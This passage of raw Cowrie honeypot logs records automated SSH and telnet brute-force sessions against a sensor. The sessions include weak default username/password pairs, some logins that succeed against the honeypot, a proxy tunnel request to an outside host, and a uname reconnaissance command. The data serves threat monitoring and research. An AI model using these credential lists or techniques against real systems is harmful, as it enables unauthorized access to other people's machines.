],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:10:08.840931Z","src_ip":"212.227.235.229","session":"374ed396974a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T17:10:09.164136Z","src_ip":"212.227.235.229","session":"374ed396974a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:10:10.273611Z","src_ip":"212.227.235.229","session":"374ed396974a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55253,"dst_ip":"1.2.3.4","dst_port":23,"session":"15c489ee9a77","protocol":"telnet","message":"New connection: 212.227.125.160:55253 (1.2.3.4:23) [session: 15c489ee9a77]","sensor":"my-vps","timestamp":"2025-08-28T17:11:08.965905Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60458,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e88a4ae28ec","protocol":"ssh","message":"New connection: 212.227.125.160:60458 (1.2.3.4:22) [session: 0e88a4ae28ec]","sensor":"my-vps","timestamp":"2025-08-28T17:11:29.247261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:11:29.248218Z","src_ip":"212.227.125.160","session":"0e88a4ae28ec"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:11:29.297366Z","src_ip":"212.227.125.160","session":"0e88a4ae28ec"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T17:11:29.447578Z","src_ip":"212.227.125.160","session":"0e88a4ae28ec"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:11:30.500043Z","src_ip":"212.227.125.160","session":"0e88a4ae28ec"}
{"eventid":"cowrie.session.connect","src_ip":"45.55.52.128","src_port":36872,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf42e78be4ce","protocol":"telnet","message":"New connection: 45.55.52.128:36872 (1.2.3.4:23) [session: cf42e78be4ce]","sensor":"my-vps","timestamp":"2025-08-28T17:12:59.039569Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:12:59.318273Z","src_ip":"45.55.52.128","session":"cf42e78be4ce"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T17:13:00.552400Z","src_ip":"45.55.52.128","session":"cf42e78be4ce"}
{"eventid":"cowrie.session.closed","duration":3.6674211025238037,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:13:02.706929Z","src_ip":"45.55.52.128","session":"cf42e78be4ce"}
{"eventid":"cowrie.session.connect","src_ip":"45.55.52.128","src_port":36882,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4feb6c222ef","protocol":"telnet","message":"New connection: 45.55.52.128:36882 (1.2.3.4:23) [session: d4feb6c222ef]","sensor":"my-vps","timestamp":"2025-08-28T17:13:02.798019Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:13:04.815393Z","src_ip":"45.55.52.128","session":"d4feb6c222ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:13:05.255221Z","src_ip":"45.55.52.128","session":"d4feb6c222ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:13:06.627779Z","src_ip":"45.55.52.128","session":"d4feb6c222ef"}
{"eventid":"cowrie.session.closed","duration":3.833381414413452,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:13:06.631308Z","src_ip":"45.55.52.128","session":"d4feb6c222ef"}
{"eventid":"cowrie.session.closed","duration":120.00367617607117,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:13:08.969489Z","src_ip":"212.227.125.160","session":"15c489ee9a77"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59046,"dst_ip":"1.2.3.4","dst_port":22,"session":"674fe4899e67","protocol":"ssh","message":"New connection: 217.72.205.35:59046 (1.2.3.4:22) [session: 674fe4899e67]","sensor":"my-vps","timestamp":"2025-08-28T17:14:12.248110Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:14:12.249296Z","src_ip":"217.72.205.35","session":"674fe4899e67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35980,"dst_ip":"1.2.3.4","dst_port":22,"session":"310878c47ace","protocol":"ssh","message":"New connection: 212.227.235.229:35980 (1.2.3.4:22) [session: 310878c47ace]","sensor":"my-vps","timestamp":"2025-08-28T17:16:38.467036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:16:38.468124Z","src_ip":"212.227.235.229","session":"310878c47ace"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:16:38.572023Z","src_ip":"212.227.235.229","session":"310878c47ace"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123","message":"login attempt [sol/123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:16:38.886094Z","src_ip":"212.227.235.229","session":"310878c47ace"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:16:39.992258Z","src_ip":"212.227.235.229","session":"310878c47ace"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61832,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad17f6fe7d61","protocol":"ssh","message":"New connection: 212.227.125.160:61832 (1.2.3.4:22) [session: ad17f6fe7d61]","sensor":"my-vps","timestamp":"2025-08-28T17:16:57.148232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:16:57.149457Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:16:57.264325Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron","message":"login attempt [byron/byron] failed","sensor":"my-vps","timestamp":"2025-08-28T17:16:58.196285Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron1","message":"login attempt [byron/byron1] failed","sensor":"my-vps","timestamp":"2025-08-28T17:16:59.313406Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron123","message":"login attempt [byron/byron123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:17:00.427901Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron1234","message":"login attempt [byron/byron1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:17:01.536892Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.login.failed","username":"byron","password":"byron12345","message":"login attempt [byron/byron12345] failed","sensor":"my-vps","timestamp":"2025-08-28T17:17:02.643962Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:17:03.732886Z","src_ip":"212.227.125.160","session":"ad17f6fe7d61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51401,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0eccdce0af3","protocol":"ssh","message":"New connection: 212.227.125.160:51401 (1.2.3.4:22) [session: e0eccdce0af3]","sensor":"my-vps","timestamp":"2025-08-28T17:17:08.101529Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:17:08.103570Z","src_ip":"212.227.125.160","session":"e0eccdce0af3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51674,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b7ac3250a23","protocol":"ssh","message":"New connection: 212.227.125.160:51674 (1.2.3.4:22) [session: 9b7ac3250a23]","sensor":"my-vps","timestamp":"2025-08-28T17:17:08.217235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:17:08.218401Z","src_ip":"212.227.125.160","session":"9b7ac3250a23"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T17:17:08.335449Z","src_ip":"212.227.125.160","session":"9b7ac3250a23"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:17:08.687097Z","src_ip":"212.227.125.160","session":"9b7ac3250a23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T17:17:08.804687Z","session":"9b7ac3250a23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50476,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca193037dc2a","protocol":"ssh","message":"New connection: 212.227.235.229:50476 (1.2.3.4:22) [session: ca193037dc2a]","sensor":"my-vps","timestamp":"2025-08-28T17:17:40.862466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:17:40.864520Z","src_ip":"212.227.235.229","session":"ca193037dc2a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:17:40.968326Z","src_ip":"212.227.235.229","session":"ca193037dc2a"}
{"eventid":"cowrie.login.failed","username":"gns3","password":"gns3","message":"login attempt [gns3/gns3] failed","sensor":"my-vps","timestamp":"2025-08-28T17:17:41.282053Z","src_ip":"212.227.235.229","session":"ca193037dc2a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:17:42.387839Z","src_ip":"212.227.235.229","session":"ca193037dc2a"}
{"eventid":"cowrie.session.connect","src_ip":"45.156.129.162","src_port":40867,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb76b149feca","protocol":"ssh","message":"New connection: 45.156.129.162:40867 (1.2.3.4:22) [session: bb76b149feca]","sensor":"my-vps","timestamp":"2025-08-28T17:17:44.174403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9","sensor":"my-vps","timestamp":"2025-08-28T17:17:44.181317Z","src_ip":"45.156.129.162","session":"bb76b149feca"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:17:49.387428Z","src_ip":"45.156.129.162","session":"bb76b149feca"}
{"eventid":"cowrie.session.connect","src_ip":"45.156.129.160","src_port":58899,"dst_ip":"1.2.3.4","dst_port":22,"session":"16711e24e0d2","protocol":"ssh","message":"New connection: 45.156.129.160:58899 (1.2.3.4:22) [session: 16711e24e0d2]","sensor":"my-vps","timestamp":"2025-08-28T17:17:49.500186Z"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:17:54.623567Z","src_ip":"45.156.129.160","session":"16711e24e0d2"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:18:18.218628Z","src_ip":"212.227.125.160","session":"9b7ac3250a23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63298,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2b482ff6a8b","protocol":"ssh","message":"New connection: 212.227.125.160:63298 (1.2.3.4:22) [session: d2b482ff6a8b]","sensor":"my-vps","timestamp":"2025-08-28T17:18:21.261721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:18:21.262806Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:18:21.355177Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.login.failed","username":"user","password":"thompson","message":"login attempt [user/thompson] failed","sensor":"my-vps","timestamp":"2025-08-28T17:18:21.763829Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.login.failed","username":"user","password":"simba","message":"login attempt [user/simba] failed","sensor":"my-vps","timestamp":"2025-08-28T17:18:22.884175Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.login.failed","username":"user","password":"scream","message":"login attempt [user/scream] failed","sensor":"my-vps","timestamp":"2025-08-28T17:18:23.980670Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.login.failed","username":"user","password":"q1q1q1","message":"login attempt [user/q1q1q1] failed","sensor":"my-vps","timestamp":"2025-08-28T17:18:25.110630Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.login.failed","username":"user","password":"primus","message":"login attempt [user/primus] failed","sensor":"my-vps","timestamp":"2025-08-28T17:18:26.226725Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42388,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d2aadf58c9f","protocol":"ssh","message":"New connection: 212.227.125.160:42388 (1.2.3.4:22) [session: 8d2aadf58c9f]","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.041031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.041960Z","src_ip":"212.227.125.160","session":"8d2aadf58c9f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.091687Z","src_ip":"212.227.125.160","session":"8d2aadf58c9f"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.242976Z","src_ip":"212.227.125.160","session":"8d2aadf58c9f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:18:27.363665Z","src_ip":"212.227.125.160","session":"8d2aadf58c9f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.364354Z","src_ip":"212.227.125.160","session":"8d2aadf58c9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.415782Z","src_ip":"212.227.125.160","session":"8d2aadf58c9f"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.417074Z","src_ip":"212.227.125.160","session":"8d2aadf58c9f"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:18:27.664560Z","src_ip":"212.227.125.160","session":"d2b482ff6a8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20565,"dst_ip":"1.2.3.4","dst_port":22,"session":"77b57bce9ed0","protocol":"ssh","message":"New connection: 212.227.235.229:20565 (1.2.3.4:22) [session: 77b57bce9ed0]","sensor":"my-vps","timestamp":"2025-08-28T17:18:43.941683Z"}
